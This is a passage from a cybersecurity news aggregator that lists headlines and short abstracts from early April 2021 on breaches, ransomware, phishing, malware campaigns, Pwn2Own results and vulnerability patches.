A set of zero-click vulnerabilities in the Linux Bluetooth subsystem that allow nearby, unauthenticated attackers “to execute arbitrary code with kernel privileges on vulnerable devices”.The Daily Swig
April 8, 2021 – Breach
Hackers Compromised a Popular Carding Site Exposing 300,000 User Account Details Full Text
Abstract
The data breach on Card Mafia, a forum for stealing and trading credit cards, exposed email addresses, hashed passwords, usernames, and IP addresses of 297,744 carding site users.CPO Magazine
April 8, 2021 – Phishing
Stimulus Stimulates Unemployment Scams Full Text
Abstract
Suspicious unemployment-related emails up 50% in US since late FebruaryInfosecurity Magazine
April 8, 2021 – Breach
Swarmshop – What goes around comes around: hackers leak other hackers’ data online Full Text
Abstract
Group-IB, a global threat hunting and adversary-centric cyber intelligence company, discovered that user data of the Swarmshop card shop have been leaked online on March 17, 2021. The database was posted on a different underground forum...Security Affairs
April 08, 2021 – General
Microsoft releases a cyberattack simulator - Shall we play a game? Full Text
Abstract
Microsoft has released an open-source cyberattack simulator that allows security researchers and data scientists to create simulated network environments and see how they fare against AI-controlled cyber agents.BleepingComputer
April 08, 2021 – Government
Commerce blacklists seven Chinese supercomputing groups Full Text
Abstract
The Commerce Department on Thursday blacklisted seven Chinese supercomputing groups, adding the companies to its "entity list” as potential national security threats.The Hill
April 8, 2021 – General
Americans Avoid Sites After Forgetting Passwords Full Text
Abstract
Password forgetfulness triggers site and account avoidance in 64% of AmericansInfosecurity Magazine
April 8, 2021 – Vulnerabilities
Pwn2Own 2021 Day 2 – experts earned $200K for a zero-interaction Zoom exploit Full Text
Abstract
Pwn2Own 2021 - Day 2: a security duo earned $200,000 for a zero-interaction Zoom exploit allowing remote code execution. One of the most interesting working exploits of the second day of the Pwn2Own 2021 was demonstrated by security researchers Daan...Security Affairs
April 08, 2021 – Vulnerabilities
Windows 10 hacked again at Pwn2Own, Chrome and Zoom also fall Full Text
Abstract
Contestants hacked Microsoft's Windows 10 OS twice during the second day of the Pwn2Own 2021 competition, together with the Google Chrome web browser and the Zoom video communication platform.BleepingComputer
April 8, 2021 – Vulnerabilities
Cisco RCE Flaws Let Attackers Escalate Privileges Full Text
Abstract
Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or allow an authenticated, local...Cyber Security News
April 8, 2021 – Ransomware
Did 4 Major Ransomware Groups Truly Form a Cartel? Full Text
Abstract
The four cybercriminal groups — Twisted Spider, Viking Spider, Wizard Spider, and the Lockbit Gang — announced at different times throughout summer 2020 that they would be working together.Dark Reading
April 08, 2021 – Malware
Researchers uncover a new Iranian malware used in recent cyberattacks Full Text
Abstract
An Iranian threat actor has unleashed a new cyberespionage campaign against a possible Lebanese target with a backdoor capable of exfiltrating sensitive information from compromised systems. Cybersecurity firm Check Point attributed the operation to APT34, citing similarities with previous techniques used by the threat actor as well as based on its pattern of victimology. APT34 (aka OilRig) is known for its reconnaissance campaigns aligned with the strategic interests of Iran, primarily hitting financial, government, energy, chemical, and telecommunications industries in the Middle East. The group typically resorts to targeting individuals through the use of booby-trapped job offer documents, delivered directly to the victims via LinkedIn messages, and the latest campaign is no exception, although the mode of delivery remains unclear as yet. The Word document analyzed by Check Point — which was uploaded to VirusTotal from Lebanon on January 10 — claims to offer information aboThe Hacker News
April 8, 2021 – Breach
Scraped data of 500 million LinkedIn users being sold online, 2 million records leaked as proof Full Text
Abstract
Days after a massive Facebook data leak made the headlines, the data of 500 million LinkedIn users is being sold online, and the seller leaked 2 million records as proof. Original Post at https://cybernews.com/news/stolen-data-of-500-million-linkedin-users-being-sold-online-2-million-leaked-as-proof-2/ An...Security Affairs
April 8, 2021 – Business
Cofense acquires Cyberfish to eliminate the need for legacy email security solutions Full Text
Abstract
Cofense announced the acquisition of Cyberfish, a provider of next-generation phishing protection powered by Computer Vision and advanced Machine Learning (ML) technology.Help Net Security
April 8, 2021 – Malware
Yanbian Gang Malware Continues with Wide-Scale Distribution and C2 Full Text
Abstract
Yanbian Gang has targeted South Korean Android mobile banking customers since 2013 with malicious Android apps purporting to be from major banks, namely Shinhan Savings Bank, Saemaul Geumgo, and more.Risk IQ
April 08, 2021 – Phishing
Microsoft Office 365 phishing evades detection with HTML Lego pieces Full Text
Abstract
A recent phishing campaign used a clever trick to deliver the fraudulent web page that collects Microsoft Office 365 credentials by building it from chunks of HTML code stored locally and remotely.BleepingComputer
April 8, 2021 – IOT
Massive increase in endpoint attacks, rising rate of encrypted malware and new exploits targeting IoT Full Text
Abstract
Fileless malware and cryptominer attack rates grew by nearly 900% and 25% respectively, while unique ransomware payloads plummeted by 48% in 2020 compared to 2019, according to WatchGuard.Help Net Security
April 08, 2021 – Ransomware
Hackers Exploit Unpatched VPNs to Install Ransomware on Industrial Targets Full Text
Abstract
Unpatched Fortinet VPN devices are being targeted in a series of attacks against industrial enterprises in Europe to deploy a new strain of ransomware called "Cring" inside corporate networks. At least one of the hacking incidents led to the temporary shutdown of a production site, said cybersecurity firm Kaspersky in a report published on Wednesday, without publicly naming the victim. The attacks happened in the first quarter of 2021, between January and March. "Various details of the attack indicate that the attackers had carefully analyzed the infrastructure of the targeted organization and prepared their own infrastructure and toolset based on the information collected at the reconnaissance stage," said Vyacheslav Kopeytsev, a security researcher at Kaspersky ICS CERT. The disclosure comes days after the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warned of advanced persistent threat (APT) actorThe Hacker News
April 8, 2021 – General
Online Fraud in the UK Up 179% in the Last Decade Full Text
Abstract
UK has been more heavily impacted by online fraud than any other country in EuropeInfosecurity Magazine
April 8, 2021 – Vulnerabilities
Cisco fixed multiple flaws in SD-WAN vManage Software, including a critical RCE Full Text
Abstract
Cisco has addressed a critical pre-authentication remote code execution (RCE) vulnerability in the SD-WAN vManage Software. Cisco has addressed multiple vulnerabilities in Cisco SD-WAN vManage Software that could be exploited by an unauthenticated,...Security Affairs
April 08, 2021 – Malware
North Korean hackers use new Vyveva malware to attack freighters Full Text
Abstract
The North Korean-backed Lazarus hacking group used new malware with backdoor capabilities dubbed Vyveva by ESET researchers in targeted attacks against a South African freight logistics company.BleepingComputer
April 8, 2021 – Malware
Fake Trezor App Steals Cryptocurrency Worth Over $1 Million From Users Full Text
Abstract
According to the Washington Post, the fake Trezor app, which was on the App Store for at least two weeks (from 22 January to 3 February), was downloaded 1,000 times before it was taken down.Malwarebytes Labs
April 08, 2021 – Policy and Law
NIST and HIPAA: Is There a Password Connection? Full Text
Abstract
When dealing with user data, it's essential that we design our password policies around compliance. These policies are defined both internally and externally. While companies uphold their own password standards, outside forces like HIPAA and NIST have a heavy influence. Impacts are defined by industry and one's unique infrastructure. How do IT departments maintain compliance with NIST and HIPAA? We'll discuss each compliance measure and its importance in this article. What is NIST compliance? Defined by the National Institute of Standards and Technology, NIST compliance aims to harden federal systems against cyber-attacks. While the agency is non-regulatory, it is part of the U.S. Department of Commerce, which has plenty of influence over government agencies and their contractors. For example, NIST guidelines help agencies satisfy the requirements of the Federal Information Security Management Act (FISMA). NIST is instrumental in creating Federal Information ProceThe Hacker News
April 8, 2021 – General
Armed Conflict Draws Closer as State-Backed Cyber-Attacks Intensify Full Text
Abstract
HP report reveals 100% increase in government-sponsored attacksInfosecurity Magazine
April 08, 2021 – Phishing
Tech support scammers lure victims with fake antivirus billing emails Full Text
Abstract
Tech support scammers are pretending to be from Microsoft, McAfee, and Norton to target users with fake antivirus billing renewals in a large-scale email campaign.BleepingComputer
April 8, 2021 – Ransomware
Ransomware Attacks Disrupt Production at Two Manufacturing Sites in Italy Full Text
Abstract
A ransomware incident earlier this year temporarily shut down production for two days at a pair of manufacturing facilities in Italy, incident responders at security firm Kaspersky said Wednesday.Cyberscoop
April 8, 2021 – Business
ACC Launches Data Security Program for Law Firms Full Text
Abstract
Program will enable prospective clients to assess and compare law firms’ data security standards. Infosecurity Magazine
April 8, 2021 – Breach
Office Depot Europe Exposed Customer Data Online: Report Full Text
Abstract
The records were labeled “Production” and contained customer PII such as names, phone numbers, physical addresses (home and/or office), @members.ebay addresses, and hashed passwords. Website Planet
April 8, 2021 – General
Number of US Breach Victims Jumps 564% in Q1 2021 Full Text
Abstract
ITRC data reveals an increase of just 12% in incidents. Infosecurity Magazine
April 8, 2021 – Hacker
Hackers Are Exploiting Discord and Slack Links to Serve Up Malware Full Text
Abstract
New research by Talos highlights how, over the course of the Covid-19 pandemic, collaboration tools like Slack and, much more commonly, Discord have become handy mechanisms for cybercriminals. Wired
April 8, 2021 – APT
New APT27 Cyberespionage Campaign Unveiled Full Text
Abstract
Kaspersky spotted a cyberespionage campaign targeted against government and military organizations in Vietnam via DLL side-loading. Cyware Alerts - Hacker News
April 8, 2021 – Vulnerabilities
Google Patches Critical Code Execution Vulnerability in Android Full Text
Abstract
The April 2021 Android security bulletin by Google describes more than 30 vulnerabilities in the mobile operating system, including a remote code execution flaw in the System component. Security Week
April 8, 2021 – Criminals
Cybercriminals Crack Cheat Codes and Gaming Mods to Serve Trojans Full Text
Abstract
The methodology of the attack involved adding cryptors to cheat codes, cheat engines, and mods that made it challenging for security teams to analyze the attack. Cyware Alerts - Hacker News
April 8, 2021 – Breach
User database was also hacked in the recent hack of PHP’s Git Server Full Text
Abstract
The maintainers of the PHP programming language confirmed that threat actors may have compromised a user database containing their passwords. The maintainers of the PHP programming language have provided an update regarding the security breach that... Security Affairs
April 8, 2021 – Hacker
Hackers Selling 330,000 Stolen Payment Cards and 895,000 Gift Cards from Online Shops Full Text
Abstract
What do the likes of AirBnB, Amazon, American Airlines, Chipotle, Dunkin Donuts, Nike, Marriott, Target, Subway and Walmart have in common? Well,... Cyber Security News
April 8, 2021 – Ransomware
New Cring ransomware deployed via unpatched Fortinet VPNs Full Text
Abstract
All these attacks happened in Q1 2020, and they were carried out with a new strain of ransomware named Cring (other aliases include Vjiszy1lo, Ghost, Phantom) that was first discovered in January. The Record
April 8, 2021 – Malware
BazarCall Trojan: A Malware Backed by Call Centers Full Text
Abstract
Security experts are reporting on the distribution of BazarCall malware via fake call centers. In this campaign, threat actors trick users into installing the Windows malware. Cyware Alerts - Hacker News
April 8, 2021 – General
Firmware-Focused Cyberattacks are Rising Full Text
Abstract
After taking input from 1,000 enterprise security decision-makers from China, Germany, Japan, the U.K., and the U.S., Microsoft found that 80% of global enterprises experienced firmware attacks. Cyware Alerts - Hacker News
April 8, 2021 – Policy and Law
Italian Arrested After Allegedly Paying Hitman to Murder Ex-Girlfriend Full Text
Abstract
Europol officers analyzed crypto-transactions to trace the individual. Infosecurity Magazine
April 8, 2021 – Malware
IcedID - A New Threat In Office Attachments Full Text
Abstract
The specific Excel document used in the recent wave of attacks uses XLM macros to download and execute its payload. The latest update also saw a major change in its first-stage loading mechanism. Minerva Labs
April 8, 2021 – Attack
Over 200 Bangladesh Organizations Hit by Hafnium Hacker Group Full Text
Abstract
According to a Cyber Threat Report released by the Bangladesh Government’s e-GOV CIRT on April 1st, hacker group Hafnium has launched attacks on more than 200 organizations in Bangladesh. Heimdal Security
April 8, 2021 – Policy and Law
Man arrested after hiring a hitman on the dark web Full Text
Abstract
A joint operation of Europol and the Italian Postal and Communication Police resulted in the arrest of an Italian national who hired a hitman on the dark web. Europol and the Italian Postal and Communication Police (Polizia Postale e delle Comunicazioni)... Security Affairs
April 07, 2021 – Breach
PHP Site’s User Database Was Hacked In Recent Source Code Backdoor Attack Full Text
Abstract
The maintainers of the PHP programming language have issued an update regarding the security incident that came to light late last month, stating that the actors may have gotten hold of a user database containing their passwords to make unauthorized changes to the repository. "We no longer believe the git.php.net server has been compromised. However, it is possible that the master.php.net user database leaked," Nikita Popov said in a message posted on its mailing list on April 6. On March 28, unidentified actors used the names of Rasmus Lerdorf and Popov to push malicious commits to the "php-src" repository hosted on the git.php.net server that involved adding a backdoor to the PHP source code in an instance of a software supply chain attack. While this was initially treated as a compromise of the git.php.net server, further investigation into the incident has revealed that the commits were a result of pushing them using HTTPS and password-based authenticat... The Hacker News
April 07, 2021 – General
Hillicon Valley: Twitter will not allow Trump account archive on platform | Commerce Dept. still weighing approach to Huawei, TikTok | Dating apps work to reinvent amid COVID-19 pandemic Full Text
Abstract
Twitter on Wednesday said that it will not allow any of former President Trump’s archived tweets while in office on its platform due to the account’s suspension. Meanwhile, Commerce Secretary Gina Raimondo teased next steps around Huawei and TikTok, and dating apps are scrambling to reinvent themselves in the age of COVID-19. The Hill
April 7, 2021 – Hacker
Threat actors targeted Slack and Discord as the pandemic raged on Full Text
Abstract
Collaboration tools that have become more central to how organizations operate since the pandemic are poorly understood by infosec teams and are relatively immature in terms of accompanying security protections provided by third parties. SCMagazine
April 7, 2021 – Ransomware
Ransomware cartel model didn’t fulfill potential, yet, but served as cybercrime proving ground Full Text
Abstract
Competing ransomware actors don’t have enough incentive to collaborate and share profits, but that could change as automated attacks evolve. SCMagazine
April 07, 2021 – Government
Key House leader to press for inclusion of cybersecurity in infrastructure bill Full Text
Abstract
Rep. Yvette Clarke (D-N.Y.), the chair of a key cyber House panel, said Wednesday that she would push for inclusion of language on securing critical systems as part of negotiations around President Biden’s infrastructure proposal. The Hill
April 7, 2021 – Ransomware
New Cring ransomware deployed targeting unpatched Fortinet VPN devices Full Text
Abstract
Attackers are actively exploiting the CVE-2018-13379 flaw in Fortinet VPN to deploy the Cring ransomware to organizations in the industrial sector. Threat actors are actively exploiting the CVE-2018-13379 vulnerability in Fortinet VPNs to deploy... Security Affairs
April 07, 2021 – Hacker
VISA: Hackers increasingly using web shells to steal credit cards Full Text
Abstract
Global payments processor VISA warns that threat actors are increasingly deploying web shells on compromised servers to exfiltrate credit card information stolen from online store customers. BleepingComputer
April 07, 2021 – Government
Commerce Dept. still weighing approach to Huawei, TikTok Full Text
Abstract
Commerce Secretary Gina Raimondo said Wednesday that while she intends to aggressively push back against China, reviews are ongoing about how the Biden administration will address Chinese companies Huawei and TikTok. The Hill
April 7, 2021 – Attack
Attackers Blowing Up Discord, Slack with Malware Full Text
Abstract
One Discord network search turned up 20,000 virus results, researchers found. Threatpost
April 07, 2021 – Ransomware
REvil ransomware now changes password to auto-login in Safe Mode Full Text
Abstract
A recent change to the REvil ransomware allows the threat actors to automate file encryption via Safe Mode after changing Windows passwords. BleepingComputer
April 07, 2021 – Vulnerabilities
Cisco fixes bug allowing remote code execution with root privileges Full Text
Abstract
Cisco has released security updates to address a pre-authentication remote code execution (RCE) vulnerability affecting SD-WAN vManage Software's user management function. BleepingComputer
April 7, 2021 – General
Cyberattackers Jamming Productivity of Manufacturing Sector Full Text
Abstract
Manufacturing firms have become a top target of cybercriminals, extortionists, and nation-state groups as a majority of companies continue to experience breaches impacting their factories and taking production offline. Cyware Alerts - Hacker News
April 7, 2021 – Denial Of Service
DDoS Extortion Attacks Get Stronger and More Persistent Full Text
Abstract
Akamai has recently reported three large-scale DDoS attacks. These attacks count among the six biggest volumetric DDoS attacks the company has ever recorded. Cyware Alerts - Hacker News
April 7, 2021 – General
Crossing the Line: When Cyberattacks Become Acts of War Full Text
Abstract
Saryu Nayyar, CEO at Gurucul, discusses the new Cold War and the potential for a cyberattack to prompt military action. Threatpost
April 7, 2021 – General
Krebs: It’s time for a law that invests in the digital infrastructure Full Text
Abstract
The former head of the CISA advocated for the equivalent of block grants to state and local government to modernize IT infrastructure, which in turn would boost citizen services, business growth, jobs, “and yes, help stop ransomware.” SCMagazine
April 07, 2021 – Ransomware
New Cring ransomware hits unpatched Fortinet VPN devices Full Text
Abstract
A vulnerability impacting Fortinet VPNs is being exploited by a new human-operated ransomware strain known as Cring to breach and encrypt industrial sector companies' networks. BleepingComputer
April 7, 2021 – Vulnerabilities
NSA workflow application Emissary vulnerable to malicious takeover Full Text
Abstract
Users have been urged to update their systems after the discovery of five security flaws in the Java web application, which runs in a multi-tiered P2P network of computer resources. The Daily Swig
April 7, 2021 – Breach
Consulting Firm Data Breach Impacts MSU Full Text
Abstract
Michigan State University affected by ransomware attack on contractor’s law firm. Infosecurity Magazine
April 7, 2021 – General
IT Pros Share Work Devices with Household Full Text
Abstract
Nearly a quarter of IT security professionals let household members use their work devices. Infosecurity Magazine
April 7, 2021 – Phishing
Crooks use Telegram bots and Google Forms to automate phishing Full Text
Abstract
Cybercriminals often use legitimate services such as Google Forms and Telegram to collect user data stolen on phishing websites, which helps them keep the data from being lost and start using it immediately. Security Affairs
April 7, 2021 – Malware
Fake Netflix App on Google Play Spreads Malware Via WhatsApp Full Text
Abstract
The wormable malware spread from Android to Android by sending messages offering free Netflix Premium for 60 days. Threatpost
April 7, 2021 – Vulnerabilities
Hackers Targeting Mission-critical SAP Applications Exploiting known Security Vulnerabilities Full Text
Abstract
Active cyberattacks on known vulnerabilities in SAP systems could lead to full control of unsecured SAP applications, according to a report issued... Cyber Security News
April 07, 2021 – Phishing
Google Forms and Telegram abused to collect phished credentials Full Text
Abstract
Security researchers note an increase in alternative methods to steal data from phishing attacks, as scammers obtain the stolen info through Google Forms or private Telegram bots. BleepingComputer
April 7, 2021 – Vulnerabilities
Vulnerabilities in ICS-specific backup solution open industrial facilities to attack Full Text
Abstract
Researchers from Claroty have found and privately disclosed nine vulnerabilities affecting Rockwell Automation’s FactoryTalk AssetCentre, an ICS-specific backup solution. Help Net Security
April 7, 2021 – Ransomware
Ryuk’s Rampage Has Lessons for the Enterprise Full Text
Abstract
Ryuk was among the first high-touch "human-operated" ransomware campaigns that have become prevalent in recent years, affecting both public and private sector organizations with crippling attacks. Dark Reading
April 7, 2021 – Policy and Law
Chemical Weapon Shopping Sends Dark Web User to Prison Full Text
Abstract
Broken-hearted American locked up for 12 years for trying to buy chemical weapon on dark web. Infosecurity Magazine
April 7, 2021 – Malware
Gigaset Android smartphones infected with malware after supply chain attack Full Text
Abstract
This supply chain attack took place around April 1, 2021; the ad-injecting malware was delivered to Android devices made by the Germany-based communications technology vendor. Security Affairs
April 07, 2021 – Malware
Gigaset Android phones infected by malware via hacked update server Full Text
Abstract
Owners of Gigaset Android phones have been repeatedly infected with malware since the end of March after threat actors compromised the vendor's update server in a supply-chain attack. BleepingComputer
April 7, 2021 – General
Perpetual Disruption: What is Good Cybersecurity Governance in Health Care? Full Text
Abstract
The appeal of disruptive technologies is that they offer clearly improved ways of doing things. But it also means facing new openings for threat actors, which brings the CISO role into focus. Security Intelligence
April 07, 2021 – Vulnerabilities
Android to Support Rust Programming Language to Prevent Memory Flaws Full Text
Abstract
Google on Tuesday announced that its open source version of the Android operating system will add support for the Rust programming language in a bid to prevent memory safety bugs. To that end, the company has been building parts of the Android Open Source Project (AOSP) with Rust for the past 18 months, with plans in the pipeline to scale this initiative to cover more aspects of the operating system. "Managed languages like Java and Kotlin are the best option for Android app development," Google said. "The Android OS uses Java extensively, effectively protecting large portions of the Android platform from memory bugs. Unfortunately, for the lower layers of the OS, Java and Kotlin are not an option." Stating that code written in C and C++ languages requires robust isolation when parsing untrustworthy input, Google said the technique of containing such code within a tightly constrained and unprivileged sandbox can be expensive, causing latency issues and additional... The Hacker News
April 7, 2021 – Phishing
Phishing Emails Most Commonly Originate from Eastern Europe Full Text
Abstract
The five countries sending the highest proportion of phishing emails are from Eastern Europe. Infosecurity Magazine
April 07, 2021 – Vulnerabilities
Microsoft’s Windows 10, Exchange, and Teams hacked at Pwn2Own Full Text
Abstract
During the first day of Pwn2Own 2021, contestants won $440,000 after successfully exploiting previously unknown vulnerabilities to hack Microsoft's Windows 10 OS, the Exchange mail server, and the Teams communication platform. BleepingComputer
April 7, 2021 – Malware
Aurora campaign: Attacking Azerbaijan using multiple RATs Full Text
Abstract
The malicious document targets the government of Azerbaijan using a SOCAR letter template as a phishing lure. SOCAR is the name of Azerbaijan’s Republic Oil and Gas Company. Malwarebytes Labs
April 7, 2021 – General
Pwn2Own 2021 Day 1 – participants earned more than $500k Full Text
Abstract
The Pwn2Own 2021 hacking competition has begun, and white hat hacker participants earned more than $500,000 on the first day. The Pwn2Own 2021 has begun; this year the formula for the popular hacking competition sees the distribution of the participants... Security Affairs
April 7, 2021 – Government
IG: Cybersecurity Weaknesses Persist in US Energy Dept. Full Text
Abstract
Cybersecurity weaknesses persist throughout the U.S. DOE's unclassified networks, including those of the National Nuclear Security Administration, according to an inspector general audit. Gov Info Security
April 7, 2021 – Vulnerabilities
Rust in the Android platform Full Text
Abstract
Google announced that the Android Open Source Project (AOSP) now supports the Rust programming language for developing the OS itself to prevent memory safety vulnerabilities. Chrome Releases
April 7, 2021 – General
US DoD Launches Vuln Disclosure Program for Contractor Networks Full Text
Abstract
Running as a pilot, the DIB-VDP covers participating DoD contractor partners’ information systems and web properties, as well as other assets within scope, and is separate from the existing DoD VDP. Security Week
April 7, 2021 – General
How do I select an attack detection solution for my business? Full Text
Abstract
Anuj Goel, CEO, Cyware, says that businesses should look for a solution that brings together siloed security data to boost collaboration in threat response and increases productivity using automation. Help Net Security
April 07, 2021 – Breach
Facebook attributes 533 million users’ data leak to “scraping” not hacking Full Text
Abstract
Facebook has now released a public statement clarifying the cause of and addressing some of the concerns related to the recent data leak. As reported last week, information of about 533 million Facebook profiles surfaced on a hacker forum. BleepingComputer
April 7, 2021 – Insider Threat
Coca-Cola trade secret theft underscores importance of insider threat early detection Full Text
Abstract
A research engineer used basic exfiltration techniques to steal trade secrets from Coca-Cola, but wasn't caught until she attempted to steal similar data from another company. CSO Online
April 07, 2021 – Malware
WhatsApp-based wormable Android malware spotted on the Google Play Store Full Text
Abstract
Cybersecurity researchers have discovered yet another piece of wormable Android malware, but this time downloadable directly from the official Google Play Store, that's capable of propagating via WhatsApp messages. Disguised as a rogue Netflix app under the name of "FlixOnline," the malware comes with features that allow it to automatically reply to a victim's incoming WhatsApp messages with a payload received from a command-and-control (C&C) server. "The application is actually designed to monitor the user's WhatsApp notifications, and to send automatic replies to the user's incoming messages using content that it receives from a remote C&C server," Check Point researchers said in an analysis published today. Besides masquerading as a Netflix app, the malicious "FlixOnline" app also requests intrusive permissions that allow it to create fake Login screens for other apps, with the goal of stealing credentials and gaining access to... The Hacker News
April 7, 2021 – Privacy
Privacy Concerns Raised Over Scotland’s New #COVID19 Check-In App Full Text
Abstract
Check In Scotland uploads and stores venue check-in data to a centralized database. Infosecurity Magazine
April 7, 2021 – Phishing
Crooks use Telegram bots and Google Forms to automate phishing Full Text
Abstract
Crooks increasingly often use legitimate services such as Google Forms and Telegram to obtain user data stolen on phishing websites. Group-IB, a global threat hunting and adversary-centric cyber intelligence company, has found that cybercriminals... Security Affairs
April 7, 2021 – Breach
Facebook: Stolen Data Scraped from Platform in 2019 Full Text
Abstract
The flaw that caused the leak of personal data of more than 533 million users over the weekend no longer exists; however, the social media giant still faces an investigation by EU regulators. Threatpost
April 07, 2021 – Malware
Android malware infects wannabe Netflix thieves via WhatsApp Full Text
Abstract
Newly discovered Android malware found on Google's Play Store disguised as a Netflix tool is designed to auto-spread to other devices using WhatsApp auto-replies to incoming messages. BleepingComputer
April 7, 2021 – Breach
Over 1 Million People Affected by Newly Revealed Accellion Health Data Breaches Full Text
Abstract
Months after the December cyberattack on Accellion's File Transfer Appliance, the identities of more healthcare sector entities that were affected continue to come to light. Gov Info Security
April 07, 2021 – Education
11 Useful Security Tips for Securing Your AWS Environment Full Text
Abstract
Want to take advantage of excellent cloud services? Amazon Web Services may be the perfect solution, but don't forget about AWS security. Whether you want to use AWS for a few things or everything, you need to protect access to it. Then you can make sure your business can run smoothly. Read on to learn some important AWS security tips. Use multi-factor authentication: When setting up your AWS security settings or adding new users, you should implement multi-factor authentication (MFA). MFA relies on more than one login factor to grant you access to your account. For example, when you log in to your account, the program might send a code to your mobile phone. Then you must verify that you have that phone and enter the code to access your account. MFA is an excellent way to protect your data if someone figures out your username and password. This way, you can still have a layer of protection against the hacker. Create strong passwords: Even with MFA, you should use strong, uni... The Hacker News
April 7, 2021 – General
Cybersecurity Industry Must Find Solutions for Third Party Data Security Full Text
Abstract
The growing use of third parties has thrown up major data security challenges. Infosecurity Magazine
April 7, 2021 – Malware
Gigaset Android smartphones infected with malware after supply chain attack Full Text
Abstract
A new supply chain attack made the headlines: threat actors compromised at least one update server of smartphone maker Gigaset to deliver malware. The German device maker Gigaset was the victim of a supply chain attack; threat actors compromised at least... Security Affairs
April 7, 2021 – General
One of WFH’s biggest losers: Cybersecurity Full Text
Abstract
Nearly half of businesses say work-from-home policies have hurt their cybersecurity practices, according to Verizon's (VZ) 2021 Mobile Security Index, published on Tuesday. CNN Money
April 7, 2021 – Malware
Wormable Netflix Malware Spreads Via WhatsApp Messages Full Text
Abstract
Check Point says threat is designed to phish for log-ins and card details. Infosecurity Magazine
April 7, 2021 – APT
APT Group Using Voice Changing Software in Spear-Phishing Campaign Full Text
Abstract
A sub-group of the 'Molerats' threat actor has been using voice-changing software to successfully trick targets into installing malware, according to a warning from Cado Security. Security Week
April 7, 2021 – Government
CISA: Patch Legacy SAP Vulnerabilities Urgently Full Text
Abstract
Onapsis report claims some exploited bugs date back to 2010. Infosecurity Magazine
April 7, 2021 – Phishing
Emerging hacking tool ‘EtterSilent’ mimics DocuSign, researchers find Full Text
Abstract
EtterSilent has been advertised in a Russian cybercrime forum and comes in two versions. One exploits a vulnerability in Microsoft Office, CVE-2017-8570, and one uses a malicious macro. Cyberscoop
April 7, 2021 – Breach
Office Depot Configuration Error Exposes One Million Records Full Text
Abstract
Researchers say Elasticsearch database may have been open for 10 days. Infosecurity Magazine
April 07, 2021 – Vulnerabilities
Critical Auth Bypass Bug Found in VMWare Data Centre Security Product Full Text
Abstract
A critical vulnerability in the VMware Carbon Black Cloud Workload appliance could be exploited to bypass authentication and take control of vulnerable systems. Tracked as CVE-2021-21982, the flaw is rated 9.1 out of a maximum of 10 in the CVSS scoring system and affects all versions of the product prior to 1.0.1. Carbon Black Cloud Workload is a data center security product from VMware that aims to protect critical servers and workloads hosted on vSphere, the company's cloud-computing virtualization platform. "A URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication," VMware said in its advisory, thereby allowing an adversary with network access to the interface to gain access to the administration API of the appliance. Armed with the access, a malicious actor can then view and alter administrative configuration settings, the company added. In addition to releasing a fix for CVE-2021... The Hacker News
April 7, 2021 – Government
EU institutions experienced hack attempt in March: spokesman Full Text
Abstract
The European Commission and other EU institutions were the target of a cyber attack last month, but there has been no evidence so far of any major information breach, a Commission spokesman said. Reuters
April 7, 2021 – Vulnerabilities
Zero-Click Flaw with Apple Mail Can be Triggered by Sending Two Zip Files Full Text
Abstract
Mikko Kenttala, founder and CEO of SensorFu, found a zero-click vulnerability in Apple Mail which allowed adding or modifying any arbitrary... Cyber Security News
April 07, 2021 – Malware
Pre-Installed Malware Dropper Found On German Gigaset Android Phones Full Text
Abstract
In what appears to be a fresh twist in Android malware, users of Gigaset mobile devices are encountering unwanted apps that are being downloaded and installed through a pre-installed system update app. "The culprit installing these malware apps is the Update app, package name com.redstone.ota.ui, which is a pre-installed system app," Malwarebytes researcher Nathan Collier said. "This app is not only the mobile device's system updater, but also an auto installer known as Android/PUP.Riskware.Autoins.Redstone." The development was first reported by German author and blogger Günter Born last week. While the issue seems to be mainly affecting Gigaset phones, devices from a handful of other manufacturers appear to be impacted as well. The full list of devices that come with the pre-installed auto-installer includes Gigaset GS270, Gigaset GS160, Siemens GS270, Siemens GS160, Alps P40pro, and Alps S20pro+. According to Malwarebytes, the Update app installs... The Hacker News
April 7, 2021 – Government
European Commission and other institutions were hit by a major cyber-attack Full Text
Abstract
Not only the European Commission, but many other organizations of the European Union have been targeted by a cyberattack in March. A European Commission spokesperson confirmed that the European Commission, along with other European Union organizations,... Security Affairs
April 06, 2021 – Malware
Experts uncover a new Banking Trojan targeting Latin American users Full Text
Abstract
Researchers on Tuesday revealed details of a new banking trojan targeting corporate users in Brazil at least since 2019 across various sectors such as engineering, healthcare, retail, manufacturing, finance, transportation, and government. Dubbed "Janeleiro" by Slovak cybersecurity firm ESET, the malware aims to disguise its true intent via lookalike pop-up windows that are designed to resemble the websites of some of the biggest banks in the country, including Itaú Unibanco, Santander, Banco do Brasil, Caixa Econômica Federal, and Banco Bradesco. "These pop-ups contain fake forms, aiming to trick the malware's victims into entering their banking credentials and personal information that the malware captures and exfiltrates to its [command-and-control] servers," ESET researchers Facundo Muñoz and Matías Porolli said in a write-up. This modus operandi is not new to banking trojans. In August 2020, ESET uncovered a Latin American (LATAM) banking trojan call... The Hacker News
April 6, 2021 – Vulnerabilities
Bug allows attackers to hijack Windows time sync software used to track security incidents Full Text
Abstract
Any disruption to Greyware’s Domain Time II could make it virtually impossible to track a security incident – and any sequence of events that are important to the business or regulators. SCMagazine
April 6, 2021 – Phishing
Array of recent phishing schemes use personalized job lures, voice manipulation Full Text
Abstract
Golden Chickens gang looks to infect targets with backdoor trojan, while MoleRats actors use audio tool to perhaps sound like women in vishing messages. SCMagazine
April 06, 2021 – General
Hillicon Valley: Intel heads to resume threats hearing scrapped under Trump | New small business coalition to urge action on antitrust policy | Amazon backs corporate tax hike to pay for infrastructure Full Text
Abstract
The House and Senate Intelligence panels will hold hearings to examine worldwide threats, including those in the cyber and technology spaces, next week after a two-year gap. Meanwhile, a new coalition of independent businesses is targeting Amazon as it pushes for a revamp of federal antitrust policy, and Amazon CEO Jeff Bezos is throwing his weight behind raising the corporate tax rate to pay for President Biden’s infrastructure package. The Hill
April 06, 2021 – Ransomware
Windows XP makes ransomware gangs work harder for their money Full Text
Abstract
A recently created ransomware decryptor illustrates how threat actors have to support Windows XP, even though Microsoft dropped support for it seven years ago. BleepingComputer
April 6, 2021 – Breach
Scraped data of 500 million LinkedIn users being sold online, 2 million records leaked as proof Full Text
Abstract
The leaked files contain information of the LinkedIn users whose data has been allegedly scraped, including their full names, email addresses, phone numbers, workplace information, and more. Cyber News
April 06, 2021 – Disinformation
